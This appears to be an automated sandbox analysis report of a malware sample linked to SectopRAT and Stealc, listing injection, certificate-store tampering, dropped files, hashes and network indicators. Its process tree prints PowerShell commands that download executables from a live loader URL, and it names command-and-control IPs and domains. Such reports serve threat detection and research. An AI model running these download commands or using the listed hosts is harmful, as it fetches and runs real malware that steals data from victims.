Analysis Overview
SHA256
1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Threat Level: Known bad
The file file was found to be: Known bad.
Malicious Activity Summary
SectopRAT
SectopRAT payload
Stealc
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Suspicious use of SetThreadContext
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-26 09:05
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
145s
Max time network
144s
Command Line
Signatures
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1092 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1784 set thread context of 2688 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nso313F.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.188:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| RU | 91.215.85.66:15647 | tcp |
Files
\Users\Admin\AppData\Local\Temp\nso313F.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar350E.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6daecd9d718481846b9807ccf0f68fd5 |
| SHA1 | a81d27070405c4685459a8df30da56e472241868 |
| SHA256 | 52d7e15396072b912cb7a3a0fc3c651abbe84824af98cc47406fb10e18c4bd6c |
| SHA512 | 2e9471fef8d84d4159c3f01a8954f8326fa9b00dec1285b05ff7cfc99a7d53229e593f289a4037bf36629518d64f25b9365439c7db10854b798322728a46cdb4 |
C:\Users\Admin\AppData\Local\Temp\nso313F.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/1176-151-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1176-152-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1176-153-0x0000000002700000-0x0000000002740000-memory.dmp
memory/1176-154-0x0000000002700000-0x0000000002740000-memory.dmp
memory/1176-155-0x0000000073C30000-0x00000000741DB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | aac375504b8ede54056163c34be8e372 |
| SHA1 | 4886a04d3ebe79f064527868eb581a55562e6dbc |
| SHA256 | e64206a35779430993059d57dde75c368a6387ca3a5fab69e171c93d51f8fd7b |
| SHA512 | ea5bd0fe621b5db034ddb079974e9685cc434ba11f7751ec8dc9469cbdab68f723fd8271deed5a3293753bb8d640181da521721e382f246d303b305371d7a3a7 |
memory/2640-161-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/2640-162-0x0000000002920000-0x0000000002960000-memory.dmp
memory/2640-163-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/2640-165-0x0000000073680000-0x0000000073C2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1772-170-0x0000000004190000-0x0000000004290000-memory.dmp
memory/1772-173-0x0000000000230000-0x000000000029D000-memory.dmp
memory/2684-178-0x0000000002A30000-0x0000000002A70000-memory.dmp
memory/2684-179-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/2684-180-0x0000000002A30000-0x0000000002A70000-memory.dmp
memory/2684-181-0x0000000073C30000-0x00000000741DB000-memory.dmp
memory/1048-192-0x00000000005A0000-0x00000000005A1000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1d8.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/1020-213-0x00000000041B0000-0x00000000042B0000-memory.dmp
memory/1020-214-0x0000000000220000-0x0000000000247000-memory.dmp
memory/1020-215-0x0000000000400000-0x000000000403C000-memory.dmp
memory/1720-224-0x0000000073680000-0x0000000073C2B000-memory.dmp
